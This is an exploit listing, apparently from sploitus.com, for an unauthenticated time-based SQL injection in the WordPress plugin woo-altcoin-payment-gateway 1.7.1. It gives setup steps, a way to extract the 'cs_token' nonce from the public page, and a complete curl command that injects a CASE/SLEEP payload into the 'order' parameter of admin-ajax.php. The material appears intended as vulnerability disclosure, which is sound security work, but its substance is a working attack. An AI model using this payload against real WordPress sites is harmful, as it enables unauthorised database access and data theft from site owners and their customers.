Share
## https://sploitus.com/exploit?id=WPEX-ID:2839FF82-7D37-4392-8FA3-D490680D42C4
Setup:

1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:

Payment Confirmation Type: Manual
Enter Coin Name: Bitcoin
Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
Active / Deactivate: checked

Attack:

1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token"
2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \
    --data 'method=admin\options\functions\Coin_List@prepare_items'